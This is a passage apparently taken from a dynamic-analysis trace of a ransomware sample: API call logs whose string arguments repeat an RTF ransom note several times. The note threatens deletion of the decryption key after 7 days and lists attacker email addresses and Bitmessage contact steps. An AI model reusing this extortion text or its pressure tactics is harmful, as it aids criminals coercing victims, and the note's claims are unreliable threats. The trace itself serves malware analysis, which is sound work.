RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.776] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.776] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" 